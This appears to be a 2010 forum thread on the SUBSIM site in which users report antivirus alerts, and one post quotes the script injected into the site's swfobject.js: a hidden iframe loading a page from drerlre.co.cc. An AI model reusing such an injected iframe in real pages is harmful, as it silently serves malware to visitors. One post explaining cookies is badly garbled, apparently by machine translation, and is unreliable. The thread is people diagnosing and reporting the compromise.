![]() |
SUBSIM: The Web's #1 resource for all submarine & naval simulations since 1997 |
![]() |
#31 |
Navy Seal
![]() Join Date: Apr 2005
Posts: 5,501
Downloads: 19
Uploads: 0
|
![]()
I started getting this message this afternoon. Now it pops up everytime I touch this site, and ONLY this site.
![]() |
![]() |
![]() |
#32 |
SUBSIM Newsman
|
HTTP cookie or first-party session cookies. These ARE temporary cookies set by the web site-being visited (the first-party). Cleared-when browser is closed.First-party persistent cookies. These ARE permanent cookies set by the web site-being visited (the first-party). They Are Permanently stored and Will Be retained eller Batch Their Requested expiration date and time when, or Batch They Are Manually deleted through sometime user action.Third-party session cookies. These ARE temporary cookies are not set by the the first-party, But Rather village sometime other "Third-party" web server. Third-party persistent cookies. These ARE permanent cookies That ARE stored Permanently, They Will Be retained or Batch They Are Manually deleted through sometime user action. These Are The worst of all cookies, Since They Are Typically planted Into a user's browser Without the user's knowledge, permission, or expectation, after Which Time Do They cannabis and ers, Used to track users across the Internet Compiling profiles of sites visited, search queries Used, and collecting all Manner of staff and private information. Flash cookies = an Entirely Different form of "cookie," That Is Not wrist village browser settings (by normal 'cookie' protocol) That Must Be dealt with by Entirely Different methods.Advertisers (and Other unscrupulous parties) Have managed to trick your browser Into Revealing information about you & your surfing habits (and more) with These 3rd party cookies (and Lately "flash cookies).These Are The Ones That Many anti-malware scans turn up as 'spyware' or Worse. You Should always blocks These, as They Are Hardly ever Needed by anyone. Settings ARE usually set your browser's 'Privacy' section.
__________________
Nothing in life is to be feard,it is only to be understood. Marie Curie ![]() |
![]() |
![]() |
#33 |
Rear Admiral
![]() |
![]()
seems that the drerlre.co.cc is the culprit...will notify Neal about this.
thank you Seawolf & JScones for the reports HunterICX
__________________
![]() Last edited by HunterICX; 09-30-10 at 05:06 AM. |
![]() |
![]() |
#34 |
SUBSIM Newsman
|
Are usually seen in,
I looked at the scripts that were running, and someone snuck something into their /js/swfobject.js file:document.write('<iframe width=2 height=1 frameborder=0 src="http://drerlre.co.cc/zRvFF1uVxsmdOPg9FkYf9ADSZzKnKBza"></iframe>'); http://www.microsoft.com/security/po...ID=-2147328635 Use flashblock on almost every site,That redirects to a 404 now, and it looks like their swfobject.js has been fixed, but I'm assuming that was the culprit.
__________________
Nothing in life is to be feard,it is only to be understood. Marie Curie ![]() |
![]() |
![]() |
#35 |
SUBSIM Newsman
|
Just as it is, a culprit!
__________________
Nothing in life is to be feard,it is only to be understood. Marie Curie ![]() |
![]() |
![]() |
#36 |
Silent Hunter
![]() Join Date: Aug 2005
Location: Figueira da Foz, Portugal
Posts: 4,522
Downloads: 110
Uploads: 0
|
![]()
Yep. got the same message on entering subsim again. I think that is to do with some of the advertising. I think is this, since I got portuguese adverts
"http://pagead2.googlesyndication.com...DIIr-5DB0kEKXo" But nod says the the connection is terminated and so, possibly I am safe for the momment! So vendor, I heard that you are buing the beers... ![]() |
![]() |
![]() |
#37 | |
SUBSIM Newsman
|
Sure, I can do it,
Quote:
![]()
__________________
Nothing in life is to be feard,it is only to be understood. Marie Curie ![]() |
|
![]() |
![]() |
#38 |
Born to Run Silent
|
![]()
Ok, I have hired a server security expert to check the server thoroughly and see what's up.
__________________
SUBSIM - 26 Years on the Web |
![]() |
![]() |
#39 |
Lucky Jack
![]() |
![]()
No problems on my end, both FF and Avast find nothing.
|
![]() |
![]() |
#40 |
Born to Run Silent
|
![]()
Ok, I have Scott setting up a full security check. I have not gotten any alerts from my Norton AV but when several people report this, I take it very seriously. Thanks! Will report back asap.
Neal
__________________
SUBSIM - 26 Years on the Web |
![]() |
![]() |
#41 |
Ace of the Deep
![]() Join Date: May 2008
Posts: 1,231
Downloads: 92
Uploads: 0
|
![]()
Well it looks like Nod32 1 other virus software 0
I wonder how many people have been infected and don’t know it ![]() |
![]() |
![]() |
#42 | |
Ace of the Deep
![]() Join Date: May 2008
Posts: 1,231
Downloads: 92
Uploads: 0
|
![]() Quote:
Take a look in the Nod32 Quarantine folder you will see the files that tried to infect your machine thank god they weren’t opened. My version of Nod32 also rejected the connection and install Well it looks like Nod32 1 other virus software 0 I wonder how many people have been infected and don’t know it ![]() I didn't see this thread so I opened this one http://www.subsim.com/radioroom/showthread.php?t=175533 |
|
![]() |
![]() |
#43 |
Silent Hunter
![]() Join Date: Jun 2006
Location: Norway
Posts: 4,224
Downloads: 14
Uploads: 0
|
![]()
My avast was going bonkers too, only the main page of subsim forums.
__________________
![]() |
![]() |
![]() |
#44 |
Ace of the Deep
![]() Join Date: May 2008
Posts: 1,231
Downloads: 92
Uploads: 0
|
![]()
Its strange how some did and some didn’t I wonder if its something to do with the rotation of the adverts maybe only one is infected
![]() |
![]() |
![]() |
#45 | |
SUBSIM Newsman
|
I suggest some simple steps to prevent things like this,
Quote:
__________________
Nothing in life is to be feard,it is only to be understood. Marie Curie ![]() |
|
![]() |
![]() |
Thread Tools | |
Display Modes | |
|
|